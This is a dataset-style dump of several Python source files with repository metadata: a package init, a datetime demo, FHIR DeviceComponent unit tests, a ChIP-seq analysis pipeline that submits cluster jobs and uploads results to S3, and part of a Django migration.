mltoolkit/mldp/steps/collectors/__init__.py
|
mancunian1792/FewSum
|
c2f9ef0ae7445bdb188b6ceb28e998b3fd12b78e
|
[
"MIT"
] | 28
|
2020-10-12T19:05:22.000Z
|
2022-03-18T01:19:29.000Z
|
mltoolkit/mldp/steps/collectors/__init__.py
|
mancunian1792/FewSum
|
c2f9ef0ae7445bdb188b6ceb28e998b3fd12b78e
|
[
"MIT"
] | 1
|
2022-01-30T01:52:59.000Z
|
2022-02-19T08:04:54.000Z
|
mltoolkit/mldp/steps/collectors/__init__.py
|
mancunian1792/FewSum
|
c2f9ef0ae7445bdb188b6ceb28e998b3fd12b78e
|
[
"MIT"
] | 7
|
2020-10-29T14:01:04.000Z
|
2022-02-22T18:33:10.000Z
|
from .base_chunk_collector import BaseChunkCollector
from .unit_collector import UnitCollector
from .chunk_shuffler import ChunkShuffler
from .unit_sampler import UnitSampler
from .chunk_collector import ChunkCollector
| 36.5
| 52
| 0.885845
| 26
| 219
| 7.230769
| 0.5
| 0.239362
| 0.212766
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.091324
| 219
| 5
| 53
| 43.8
| 0.944724
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
5c0cc6faa7ef9449f54b66cb95cf7a8388ad6b84
| 220
|
py
|
Python
|
Python3/Python3_Lesson13/src/making_time.py
|
ceeblet/OST_PythonCertificationTrack
|
042e0ce964bc88b3f4132dcbd7e06c5f504eae34
|
[
"MIT"
] | null | null | null |
Python3/Python3_Lesson13/src/making_time.py
|
ceeblet/OST_PythonCertificationTrack
|
042e0ce964bc88b3f4132dcbd7e06c5f504eae34
|
[
"MIT"
] | null | null | null |
Python3/Python3_Lesson13/src/making_time.py
|
ceeblet/OST_PythonCertificationTrack
|
042e0ce964bc88b3f4132dcbd7e06c5f504eae34
|
[
"MIT"
] | null | null | null |
from datetime import datetime
print(datetime(2012, 10, 31))
print(datetime(2012, 10, 31, 12))
print(datetime(2012, 10, 31, 12, 30))
print(datetime(2012, 10, 31, 12, 30, 59))
print(datetime(2012, 10, 31, 12, 30, 59, 300))
| 36.666667
| 46
| 0.690909
| 39
| 220
| 3.897436
| 0.282051
| 0.427632
| 0.559211
| 0.625
| 0.809211
| 0.671053
| 0.519737
| 0.355263
| 0
| 0
| 0
| 0.317708
| 0.127273
| 220
| 6
| 46
| 36.666667
| 0.473958
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.166667
| 0
| 0.166667
| 0.833333
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
|
0
| 9
|
30998ba5eb3ba2fcd7f5426a1c9836dea9daaecf
| 6,287
|
py
|
Python
|
fhir/resources/DSTU2/tests/test_devicecomponent.py
|
cstoltze/fhir.resources
|
52f99738935b7313089d89daf94d73ce7d167c9d
|
[
"BSD-3-Clause"
] | 144
|
2019-05-08T14:24:43.000Z
|
2022-03-30T02:37:11.000Z
|
fhir/resources/DSTU2/tests/test_devicecomponent.py
|
cstoltze/fhir.resources
|
52f99738935b7313089d89daf94d73ce7d167c9d
|
[
"BSD-3-Clause"
] | 82
|
2019-05-13T17:43:13.000Z
|
2022-03-30T16:45:17.000Z
|
fhir/resources/DSTU2/tests/test_devicecomponent.py
|
cstoltze/fhir.resources
|
52f99738935b7313089d89daf94d73ce7d167c9d
|
[
"BSD-3-Clause"
] | 48
|
2019-04-04T14:14:53.000Z
|
2022-03-30T06:07:31.000Z
|
# -*- coding: utf-8 -*-
from datetime import datetime, timezone
from .. import fhirtypes # noqa: F401
from .. import devicecomponent
def test_DeviceComponent_1(base_settings):
filename = (
base_settings["unittest_data_dir"]
/ "devicecomponent-example-prodspec.canonical.json"
)
inst = devicecomponent.DeviceComponent.parse_file(
filename, content_type="application/json", encoding="utf-8"
)
assert "DeviceComponent" == inst.resource_type
impl_DeviceComponent_1(inst)
# testing reverse by generating data from itself and create again.
data = inst.dict()
assert "DeviceComponent" == data["resourceType"]
inst2 = devicecomponent.DeviceComponent(**data)
impl_DeviceComponent_1(inst2)
def impl_DeviceComponent_1(inst):
assert inst.contained[0].id == "d1"
assert inst.contained[0].identifier[0].type.coding[0].code == "SNO"
assert (
inst.contained[0].identifier[0].type.coding[0].system
== "http://hl7.org/fhir/identifier-type"
)
assert inst.contained[0].identifier[0].type.text == "Serial Number"
assert inst.contained[0].identifier[0].value == "ID 13.1"
assert inst.contained[0].identifier[1].system == "urn:iso:std:iso:11073:10101"
assert (
inst.contained[0].identifier[1].type.text
== "Global Medical Device Nomenclature"
)
assert inst.contained[0].identifier[1].value == "2000"
assert inst.contained[0].manufacturer == "Center4MI"
assert inst.contained[0].model == "2-0-14"
assert inst.contained[0].type.coding[0].code == "2000"
assert inst.contained[0].type.coding[0].display == "MDC_DEV_ANALY_SAT_O2_MDS"
assert inst.contained[0].type.coding[0].system == "urn:iso:std:iso:11073:10101"
assert inst.id == "example-prodspec"
assert inst.identifier.type.text == "Handle ID"
assert inst.identifier.value == "0"
assert inst.languageCode.coding[0].code == "en-US"
assert inst.languageCode.coding[0].system == "http://tools.ietf.org/html/bcp47"
assert inst.lastSystemChange == datetime(
2014, 10, 7, 14, 45, 0, tzinfo=timezone.utc
)
assert inst.operationalStatus[0].coding[0].code == "0"
assert inst.operationalStatus[0].coding[0].display == "disconnected"
assert inst.operationalStatus[0].coding[0].system == "urn:iso:std:iso:11073:10101"
assert inst.productionSpecification[0].productionSpec == "xa-12324-b"
assert inst.productionSpecification[0].specType.coding[0].code == "1"
assert inst.productionSpecification[0].specType.coding[0].display == "Serial number"
assert inst.productionSpecification[1].productionSpec == "1.1"
assert inst.productionSpecification[1].specType.coding[0].code == "3"
assert (
inst.productionSpecification[1].specType.coding[0].display == "Hardware version"
)
assert inst.productionSpecification[2].productionSpec == "1.12"
assert inst.productionSpecification[2].specType.coding[0].code == "4"
assert (
inst.productionSpecification[2].specType.coding[0].display == "Software version"
)
assert inst.productionSpecification[3].productionSpec == "1.0.23"
assert inst.productionSpecification[3].specType.coding[0].code == "5"
assert (
inst.productionSpecification[3].specType.coding[0].display == "Firmware version"
)
assert inst.source.reference == "#d1"
assert (
inst.text.div
== """<div>
<p>Example of a simple MDS from a pulse oximeter containment tree</p>
</div>"""
)
assert inst.text.status == "generated"
assert inst.type.coding[0].code == "2000"
assert inst.type.coding[0].display == "MDC_DEV_ANALY_SAT_O2_MDS"
assert inst.type.coding[0].system == "urn:iso:std:iso:11073:10101"
def test_DeviceComponent_2(base_settings):
filename = (
base_settings["unittest_data_dir"] / "devicecomponent-example.canonical.json"
)
inst = devicecomponent.DeviceComponent.parse_file(
filename, content_type="application/json", encoding="utf-8"
)
assert "DeviceComponent" == inst.resource_type
impl_DeviceComponent_2(inst)
# testing reverse by generating data from itself and create again.
data = inst.dict()
assert "DeviceComponent" == data["resourceType"]
inst2 = devicecomponent.DeviceComponent(**data)
impl_DeviceComponent_2(inst2)
def impl_DeviceComponent_2(inst):
assert inst.contained[0].id == "d1"
assert inst.contained[0].identifier[0].type.coding[0].code == "SNO"
assert (
inst.contained[0].identifier[0].type.coding[0].system
== "http://hl7.org/fhir/identifier-type"
)
assert inst.contained[0].identifier[0].value == "ID 13.1"
assert inst.contained[0].identifier[1].system == "urn:iso:std:iso:11073:10101"
assert (
inst.contained[0].identifier[1].type.text
== "Global Medical Device Nomenclature"
)
assert inst.contained[0].identifier[1].value == "2000"
assert inst.contained[0].manufacturer == "Center4MI"
assert inst.contained[0].model == "2-0-14"
assert inst.contained[0].type.coding[0].code == "2000"
assert inst.contained[0].type.coding[0].display == "MDC_DEV_ANALY_SAT_O2_MDS"
assert inst.contained[0].type.coding[0].system == "urn:iso:std:iso:11073:10101"
assert inst.id == "example"
assert inst.identifier.type.text == "Handle ID"
assert inst.identifier.value == "0"
assert inst.languageCode.coding[0].code == "en-US"
assert inst.languageCode.coding[0].system == "http://tools.ietf.org/html/bcp47"
assert inst.lastSystemChange == datetime(
2014, 10, 7, 14, 45, 0, tzinfo=timezone.utc
)
assert inst.operationalStatus[0].coding[0].code == "0"
assert inst.operationalStatus[0].coding[0].display == "disconnected"
assert inst.operationalStatus[0].coding[0].system == "urn:iso:std:iso:11073:10101"
assert inst.source.reference == "#d1"
assert (
inst.text.div
== """<div>
<p>Example of a simple MDS from a pulse oximeter containment tree</p>
</div>"""
)
assert inst.text.status == "generated"
assert inst.type.coding[0].code == "2000"
assert inst.type.coding[0].display == "MDC_DEV_ANALY_SAT_O2_MDS"
assert inst.type.coding[0].system == "urn:iso:std:iso:11073:10101"
| 42.47973
| 88
| 0.683474
| 800
| 6,287
| 5.30875
| 0.16125
| 0.157758
| 0.111844
| 0.11773
| 0.873322
| 0.873322
| 0.873322
| 0.78008
| 0.78008
| 0.78008
| 0
| 0.055014
| 0.167329
| 6,287
| 147
| 89
| 42.768707
| 0.756256
| 0.025767
| 0
| 0.664122
| 0
| 0
| 0.198529
| 0.064869
| 0
| 0
| 0
| 0
| 0.541985
| 1
| 0.030534
| false
| 0
| 0.022901
| 0
| 0.053435
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
eb5e053339235c87de316d8c241e112b3fbc452c
| 15,575
|
py
|
Python
|
src/awsCluster/server/ChipSeqPipeline/homer_workflow/ChipSeqPipeline.py
|
AspirinCode/jupyter-genomics
|
d45526fab3de8fcc3d9fef005d4e39368ff3dfdc
|
[
"MIT"
] | 2
|
2019-01-04T08:17:27.000Z
|
2021-04-10T02:59:35.000Z
|
src/cirrus_ngs/server/deprecated/ChipSeqPipeline/homer_workflow/ChipSeqPipeline.py
|
miko-798/cirrus-ngs
|
2c005f0fe29e298652ed2164e08ada75e908229b
|
[
"MIT"
] | null | null | null |
src/cirrus_ngs/server/deprecated/ChipSeqPipeline/homer_workflow/ChipSeqPipeline.py
|
miko-798/cirrus-ngs
|
2c005f0fe29e298652ed2164e08ada75e908229b
|
[
"MIT"
] | 2
|
2021-09-10T02:57:51.000Z
|
2021-09-21T00:16:56.000Z
|
__author__ = 'Guorong Xu<g1xu@ucsd.edu>'
import sys
import subprocess
import PBSTracker
import YamlFileReader
root_dir = "/shared/workspace/ChiPSeqPipeline"
data_dir = "/shared/workspace/data_archive/ChiPSeq"
## run all analysis from download, alignment, counting and differential calculation.
def run_analysis(yaml_file):
documents = YamlFileReader.parse_yaml_file(yaml_file)
workflow = documents.get("workflow")
project_name = documents.get("project")
analysis_steps = documents.get("analysis")
s3_output_files_address = documents.get("upload")
style = documents.get("style")
genome = documents.get("genome")
sample_list = documents.get("sample")
## Download files from s3 and make a design group file.
download_files(workflow, project_name, sample_list)
if "fastqc" in analysis_steps:
run_fastqc(workflow, project_name, sample_list)
if "alignment" in analysis_steps:
run_alignment(workflow, project_name, sample_list)
if "make_tag_directory" in analysis_steps:
make_tag_directory(workflow, project_name, sample_list)
if "make_UCSC_file" in analysis_steps:
make_UCSC_file(workflow, project_name, sample_list)
if "find_peaks" in analysis_steps:
find_peaks(workflow, project_name, sample_list, style)
if "annotate_peaks" in analysis_steps:
annotate_peaks(workflow, project_name, sample_list, style, genome)
if "pos2bed" in analysis_steps:
pos2bed(workflow, project_name, sample_list, style)
if "find_motifs_genome" in analysis_steps:
find_motifs_genome(workflow, project_name, sample_list, style, genome)
## Upload resulting files to s3.
upload_files(workflow, project_name, s3_output_files_address)
print "======================================================"
print "The processing of the project \"" + project_name + "\" is done!"
print "======================================================"
## download file from s3
def download_files(workflow, project_name, sample_list):
workspace = root_dir + "/" + workflow + "/scripts/"
sample_dir = data_dir + "/" + project_name + "/" + workflow + "/"
print "executing download files..."
##copying data from s3 to local drive
for sample_file in sample_list:
if sample_file.get("filename").find(",") > -1:
sample_1 = sample_file.get("filename")[:sample_file.get("filename").find(",")]
sample_2 = sample_file.get("filename")[sample_file.get("filename").find(",") + 2:]
subprocess.call(["qsub", workspace + "download.sh", sample_file.get("download"),
sample_1, sample_dir])
subprocess.call(["qsub", workspace + "download.sh", sample_file.get("download"),
sample_2, sample_dir])
else:
subprocess.call(["qsub", workspace + "download.sh", sample_file.get("download"),
sample_file.get("filename"), sample_dir])
PBSTracker.trackPBSQueue(1, "download")
## running fastqc for all samples
def run_fastqc(workflow, project_name, sample_list):
workspace = root_dir + "/" + workflow + "/scripts/"
sample_dir = data_dir + "/" + project_name + "/" + workflow + "/"
print "executing fastqc..."
for sample_file in sample_list:
if sample_file.get("filename").find(",") > -1:
sample_1 = sample_file.get("filename")[:sample_file.get("filename").find(",")]
sample_2 = sample_file.get("filename")[sample_file.get("filename").find(",") + 2:]
output_file = sample_1.replace(".fastq", "_fastqc.zip")
subprocess.call(["qsub", workspace + "fastqc.sh", sample_dir + sample_1,
sample_dir + output_file])
output_file = sample_2.replace(".fastq", "_fastqc.zip")
subprocess.call(["qsub", workspace + "fastqc.sh", sample_dir + sample_2,
sample_dir + output_file])
else:
output_file = sample_file.get("filename").replace(".fastq", "_fastqc.zip")
subprocess.call(["qsub", workspace + "fastqc.sh", sample_dir + sample_file.get("filename"),
sample_dir + output_file])
PBSTracker.trackPBSQueue(1, "fastqc")
## executing ChipSeq Sequencing alignment
def run_alignment(workflow, project_name, sample_list):
workspace = root_dir + "/" + workflow + "/scripts/"
sample_dir = data_dir + "/" + project_name + "/" + workflow + "/"
print "executing alignment..."
for sample_file in sample_list:
if sample_file.get("filename").find(",") > -1:
sample_1 = sample_file.get("filename")[:sample_file.get("filename").find(",")]
sample_2 = sample_file.get("filename")[sample_file.get("filename").find(",") + 2:]
subprocess.call(["qsub", "-pe", "smp", "4", workspace + "alignment.sh", sample_dir + sample_1])
subprocess.call(["qsub", "-pe", "smp", "4", workspace + "alignment.sh", sample_dir + sample_2])
else:
subprocess.call(["qsub", "-pe", "smp", "4", workspace + "alignment.sh", sample_dir + sample_file.get("filename")])
PBSTracker.trackPBSQueue(1, "alignment")
## make tag directory
def make_tag_directory(workflow, project_name, sample_list):
workspace = root_dir + "/" + workflow + "/scripts/"
sample_dir = data_dir + "/" + project_name + "/" + workflow + "/"
print "executing make_tag_directory..."
for sample_file in sample_list:
if sample_file.get("filename").find(",") > -1:
sample_1 = sample_file.get("filename")[:sample_file.get("filename").find(",")]
sample_2 = sample_file.get("filename")[sample_file.get("filename").find(",") + 2:]
input_file = sample_1.replace(".fastq", ".fastq.sam")
output_tag_folder = sample_1[:-6]
subprocess.call(["qsub", workspace + "make_tag_directory.sh",
sample_dir + output_tag_folder, sample_dir + input_file])
input_file = sample_2.replace(".fastq", ".fastq.sam")
output_tag_folder = sample_2[:-6]
subprocess.call(["qsub", workspace + "make_tag_directory.sh",
sample_dir + output_tag_folder, sample_dir + input_file])
else:
input_file = sample_file.get("filename").replace(".fastq", ".fastq.sam")
output_tag_folder = sample_file.get("filename")[:-6]
subprocess.call(["qsub", workspace + "make_tag_directory.sh",
sample_dir + output_tag_folder, sample_dir + input_file])
PBSTracker.trackPBSQueue(1, "make_tag")
## make UCSC file
def make_UCSC_file(workflow, project_name, sample_list):
workspace = root_dir + "/" + workflow + "/scripts/"
sample_dir = data_dir + "/" + project_name + "/" + workflow + "/"
print "executing make_UCSC_directory..."
for sample_file in sample_list:
if sample_file.get("filename").find(",") > -1:
sample_1 = sample_file.get("filename")[:sample_file.get("filename").find(",")]
sample_2 = sample_file.get("filename")[sample_file.get("filename").find(",") + 2:]
input_tag_folder = sample_1[:-6]
subprocess.call(["qsub", workspace + "make_UCSC_file.sh", sample_dir + input_tag_folder])
input_tag_folder = sample_2[:-6]
subprocess.call(["qsub", workspace + "make_UCSC_file.sh", sample_dir + input_tag_folder])
else:
input_tag_folder = sample_file.get("filename")[:-6]
subprocess.call(["qsub", workspace + "make_UCSC_file.sh", sample_dir + input_tag_folder])
PBSTracker.trackPBSQueue(1, "make_UCSC")
## find peaks
def find_peaks(workflow, project_name, sample_list, style):
workspace = root_dir + "/" + workflow + "/scripts/"
sample_dir = data_dir + "/" + project_name + "/" + workflow + "/"
print "executing find_peaks..."
for sample_file in sample_list:
if sample_file.get("filename").find(",") < 0:
chip_tag_folder = sample_file.get("filename")[:-6]
if style == "factor":
output_peak_file = chip_tag_folder + "/peaks.txt"
subprocess.call(["qsub", workspace + "find_peaks.sh", sample_dir + chip_tag_folder, style,
sample_dir + output_peak_file])
if style == "histone":
output_peak_file = chip_tag_folder + "/regions.txt"
subprocess.call(["qsub", workspace + "find_peaks.sh", sample_dir + chip_tag_folder, style,
sample_dir + output_peak_file])
else:
chip_tag_folder = sample_file.get("filename")[:sample_file.get("filename").find(",")][:-6]
input_tag_folder = sample_file.get("filename")[sample_file.get("filename").find(",") + 2:][:-6]
print chip_tag_folder
print input_tag_folder
if style == "factor":
output_peak_file = chip_tag_folder + "_vs_" + input_tag_folder + "/peaks.txt"
subprocess.call(["qsub", workspace + "find_peaks.sh", sample_dir + chip_tag_folder, style,
sample_dir + output_peak_file, sample_dir + input_tag_folder])
if style == "histone":
output_peak_file = chip_tag_folder + "_vs_" + input_tag_folder + "/regions.txt"
subprocess.call(["qsub", workspace + "find_peaks.sh", sample_dir + chip_tag_folder, style,
sample_dir + output_peak_file, sample_dir + input_tag_folder])
PBSTracker.trackPBSQueue(1, "find_peaks")
## annotate peaks
def annotate_peaks(workflow, project_name, sample_list, style, genome):
workspace = root_dir + "/" + workflow + "/scripts/"
sample_dir = data_dir + "/" + project_name + "/" + workflow + "/"
print "executing annotate_peaks..."
for sample_file in sample_list:
if sample_file.get("filename").find(",") < 0:
input_tag_folder = sample_file.get("filename")[:-6]
if style == "factor":
subprocess.call(["qsub", workspace + "annotate_peaks.sh", sample_dir + input_tag_folder + "/peaks.txt",
sample_dir + input_tag_folder + "/peaks.annotate.txt", input_tag_folder, genome])
if style == "histone":
subprocess.call(["qsub", workspace + "annotate_peaks.sh", sample_dir + input_tag_folder + "/regions.txt",
sample_dir + input_tag_folder + "/regions.annotate.txt", input_tag_folder, genome])
else:
chip_tag_folder = sample_file.get("filename")[:sample_file.get("filename").find(",")][:-6]
input_tag_folder = sample_file.get("filename")[sample_file.get("filename").find(",") + 2:][:-6]
group_tag_folder = chip_tag_folder + "_vs_" + input_tag_folder
if style == "factor":
subprocess.call(["qsub", workspace + "annotate_peaks.sh", sample_dir + group_tag_folder + "/peaks.txt",
sample_dir + group_tag_folder + "/peaks.annotate.txt", sample_dir + group_tag_folder, genome])
if style == "histone":
subprocess.call(["qsub", workspace + "annotate_peaks.sh", sample_dir + group_tag_folder + "/regions.txt",
sample_dir + group_tag_folder + "/regions.annotate.txt", sample_dir + group_tag_folder, genome])
PBSTracker.trackPBSQueue(1, "annotate_p")
## pos2bed
def pos2bed(workflow, project_name, sample_list, style):
workspace = root_dir + "/" + workflow + "/scripts/"
sample_dir = data_dir + "/" + project_name + "/" + workflow + "/"
print "executing pos2bed..."
for sample_file in sample_list:
if sample_file.get("filename").find(",") < 0:
input_tag_folder = sample_file[:-6]
if style == "factor":
subprocess.call(["qsub", workspace + "pos2bed.sh", sample_dir + input_tag_folder + "/peaks.txt",
sample_dir + input_tag_folder + "/output.bed"])
if style == "histone":
subprocess.call(["qsub", workspace + "pos2bed.sh", sample_dir + input_tag_folder + "/regions.txt",
sample_dir + input_tag_folder + "/output.bed"])
else:
chip_tag_folder = sample_file.get("filename")[:sample_file.get("filename").find(",")][:-6]
input_tag_folder = sample_file.get("filename")[sample_file.get("filename").find(",") + 2:][:-6]
group_tag_folder = chip_tag_folder + "_vs_" + input_tag_folder
if style == "factor":
subprocess.call(["qsub", workspace + "pos2bed.sh", sample_dir + group_tag_folder + "/peaks.txt",
sample_dir + group_tag_folder + "/output.bed"])
if style == "histone":
subprocess.call(["qsub", workspace + "pos2bed.sh", sample_dir + group_tag_folder + "/regions.txt",
sample_dir + group_tag_folder + "/output.bed"])
PBSTracker.trackPBSQueue(1, "pos2bed")
## find motifs genome
def find_motifs_genome(workflow, project_name, sample_list, style, genome):
workspace = root_dir + "/" + workflow + "/scripts/"
sample_dir = data_dir + "/" + project_name + "/" + workflow + "/"
print "executing find_motifs_genome..."
for sample_file in sample_list:
if sample_file.get("filename").find(",") < 0:
input_tag_folder = sample_file.get("filename")[:-6]
if style == "factor":
subprocess.call(["qsub", workspace + "find_motifs_genome.sh", sample_dir + input_tag_folder + "/peaks.txt",
sample_dir + input_tag_folder + "/MotifOutput/", genome])
if style == "histone":
subprocess.call(["qsub", workspace + "find_motifs_genome.sh", sample_dir + input_tag_folder + "/regions.txt",
sample_dir + input_tag_folder + "/MotifOutput/", genome])
else:
chip_tag_folder = sample_file.get("filename")[:sample_file.get("filename").find(",")][:-6]
input_tag_folder = sample_file.get("filename")[sample_file.get("filename").find(",") + 2:][:-6]
group_tag_folder = chip_tag_folder + "_vs_" + input_tag_folder
if style == "factor":
subprocess.call(["qsub", workspace + "find_motifs_genome.sh", sample_dir + group_tag_folder + "/peaks.txt",
sample_dir + group_tag_folder + "/MotifOutput/", genome])
if style == "histone":
subprocess.call(["qsub", workspace + "find_motifs_genome.sh", sample_dir + group_tag_folder + "/regions.txt",
sample_dir + group_tag_folder + "/MotifOutput/", genome])
PBSTracker.trackPBSQueue(1, "find_motif")
## uploading resulting files to s3.
def upload_files(workflow, project_name, s3_output_files_address):
print "executing upload files..."
workspace = root_dir + "/" + workflow + "/scripts/"
sample_dir = data_dir + "/" + project_name + "/" + workflow + "/"
subprocess.call(["qsub", workspace + "upload.sh", sample_dir, s3_output_files_address + "/" + project_name + "/" + workflow])
PBSTracker.trackPBSQueue(1, "upload")
if __name__ == '__main__':
#yaml_file = "/Users/guorongxu/Desktop/workspace/projects/jupyter-genomics_bitbucket/src/awsCluster/chipSeq/Sample_cDNA.yaml"
yaml_file = sys.argv[1]
run_analysis(yaml_file)
| 50.898693
| 129
| 0.614575
| 1,788
| 15,575
| 5.044743
| 0.068792
| 0.074834
| 0.083592
| 0.128049
| 0.801774
| 0.796452
| 0.78337
| 0.749778
| 0.704435
| 0.688581
| 0
| 0.00793
| 0.238909
| 15,575
| 305
| 130
| 51.065574
| 0.752995
| 0.03435
| 0
| 0.515021
| 0
| 0
| 0.170686
| 0.028781
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0.017167
| null | null | 0.064378
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
eb7b5fe95eb714fbb25f3efa3b45940a694c9342
| 83
|
py
|
Python
|
bibbutler_web/models/__init__.py
|
dolonnen/bibbuttler
|
a9f672d0321fa6d060e204ecc952ed333edc1d81
|
[
"MIT"
] | null | null | null |
bibbutler_web/models/__init__.py
|
dolonnen/bibbuttler
|
a9f672d0321fa6d060e204ecc952ed333edc1d81
|
[
"MIT"
] | null | null | null |
bibbutler_web/models/__init__.py
|
dolonnen/bibbuttler
|
a9f672d0321fa6d060e204ecc952ed333edc1d81
|
[
"MIT"
] | null | null | null |
from bibbutler_web.models.general import *
from bibbutler_web.models.entry import *
| 41.5
| 42
| 0.843373
| 12
| 83
| 5.666667
| 0.583333
| 0.382353
| 0.470588
| 0.647059
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.084337
| 83
| 2
| 43
| 41.5
| 0.894737
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
ebcc817803d04787734db724b3b76d19ca86369b
| 8,304
|
py
|
Python
|
roza/migrations/0012_auto_20210419_1547.py
|
sahin88/roza-tex
|
a05fdcaac7ba0e609e579d60a20ff9b13d824c64
|
[
"Unlicense"
] | null | null | null |
roza/migrations/0012_auto_20210419_1547.py
|
sahin88/roza-tex
|
a05fdcaac7ba0e609e579d60a20ff9b13d824c64
|
[
"Unlicense"
] | null | null | null |
roza/migrations/0012_auto_20210419_1547.py
|
sahin88/roza-tex
|
a05fdcaac7ba0e609e579d60a20ff9b13d824c64
|
[
"Unlicense"
] | null | null | null |
# Generated by Django 3.1.7 on 2021-04-19 15:47
from django.db import migrations, models
import django.utils.timezone
class Migration(migrations.Migration):
dependencies = [
('roza', '0011_auto_20210324_2254'),
]
operations = [
migrations.CreateModel(
name='homep',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('image1', models.ImageField(blank=True, upload_to='home/images')),
('msg1', models.CharField(blank=True, max_length=255)),
('image2', models.ImageField(blank=True, upload_to='home/images')),
('msg2', models.CharField(blank=True, max_length=255)),
('image3', models.ImageField(blank=True, upload_to='home/images')),
('msg3', models.CharField(blank=True, max_length=255)),
],
),
migrations.CreateModel(
name='newsfeed_model',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('image1', models.ImageField(blank=True, null=True, upload_to='home/bottom/images')),
('title', models.CharField(blank=True, max_length=255)),
('description', models.TextField(blank=True)),
],
),
migrations.DeleteModel(
name='Home',
),
migrations.DeleteModel(
name='NewsFeed',
),
migrations.AlterField(
model_name='about',
name='description',
field=models.TextField(blank=True),
),
migrations.AlterField(
model_name='about',
name='image',
field=models.ImageField(blank=True, default=django.utils.timezone.now, upload_to='about/images'),
preserve_default=False,
),
migrations.AlterField(
model_name='about',
name='title',
field=models.CharField(blank=True, default=django.utils.timezone.now, max_length=255),
preserve_default=False,
),
migrations.AlterField(
model_name='application',
name='application_field',
field=models.CharField(blank=True, default=django.utils.timezone.now, max_length=255),
preserve_default=False,
),
migrations.AlterField(
model_name='application',
name='description1',
field=models.TextField(blank=True, default=django.utils.timezone.now),
preserve_default=False,
),
migrations.AlterField(
model_name='application',
name='description3',
field=models.TextField(blank=True, default=django.utils.timezone.now),
preserve_default=False,
),
migrations.AlterField(
model_name='application',
name='title1',
field=models.CharField(blank=True, default=django.utils.timezone.now, max_length=255),
preserve_default=False,
),
migrations.AlterField(
model_name='application',
name='title2',
field=models.CharField(blank=True, default=django.utils.timezone.now, max_length=255),
preserve_default=False,
),
migrations.AlterField(
model_name='application',
name='title3',
field=models.CharField(blank=True, max_length=255),
),
migrations.AlterField(
model_name='product',
name='bondings',
field=models.CharField(blank=True, max_length=50),
),
migrations.AlterField(
model_name='product',
name='cd_tensile_strength_unit',
field=models.CharField(blank=True, max_length=50),
),
migrations.AlterField(
model_name='product',
name='cd_tensile_strength_value',
field=models.CharField(blank=True, max_length=50),
),
migrations.AlterField(
model_name='product',
name='coathing_unit',
field=models.CharField(blank=True, max_length=50),
),
migrations.AlterField(
model_name='product',
name='coathing_value',
field=models.CharField(blank=True, max_length=50),
),
migrations.AlterField(
model_name='product',
name='constructions',
field=models.CharField(blank=True, max_length=50),
),
migrations.AlterField(
model_name='product',
name='core_size_unit',
field=models.CharField(blank=True, max_length=50),
),
migrations.AlterField(
model_name='product',
name='core_size_value',
field=models.CharField(blank=True, max_length=50),
),
migrations.AlterField(
model_name='product',
name='elongation_at_break_unit',
field=models.CharField(blank=True, max_length=50),
),
migrations.AlterField(
model_name='product',
name='elongation_at_break_value',
field=models.CharField(blank=True, max_length=50),
),
migrations.AlterField(
model_name='product',
name='md_tensile_strength_unit',
field=models.CharField(blank=True, max_length=50),
),
migrations.AlterField(
model_name='product',
name='md_tensile_strength_value',
field=models.CharField(blank=True, max_length=50),
),
migrations.AlterField(
model_name='product',
name='patern_unit',
field=models.CharField(blank=True, max_length=50),
),
migrations.AlterField(
model_name='product',
name='patern_value',
field=models.CharField(blank=True, max_length=50),
),
migrations.AlterField(
model_name='product',
name='patterns',
field=models.CharField(blank=True, max_length=50),
),
migrations.AlterField(
model_name='product',
name='product_name',
field=models.CharField(blank=True, max_length=255),
),
migrations.AlterField(
model_name='product',
name='role_length_unit',
field=models.CharField(blank=True, max_length=50),
),
migrations.AlterField(
model_name='product',
name='role_length_value',
field=models.CharField(blank=True, max_length=50),
),
migrations.AlterField(
model_name='product',
name='role_width_unit',
field=models.CharField(blank=True, max_length=50),
),
migrations.AlterField(
model_name='product',
name='role_width_value',
field=models.CharField(blank=True, max_length=50),
),
migrations.AlterField(
model_name='product',
name='warp_yarn_unit',
field=models.CharField(blank=True, max_length=50),
),
migrations.AlterField(
model_name='product',
name='warp_yarn_value',
field=models.CharField(blank=True, max_length=50),
),
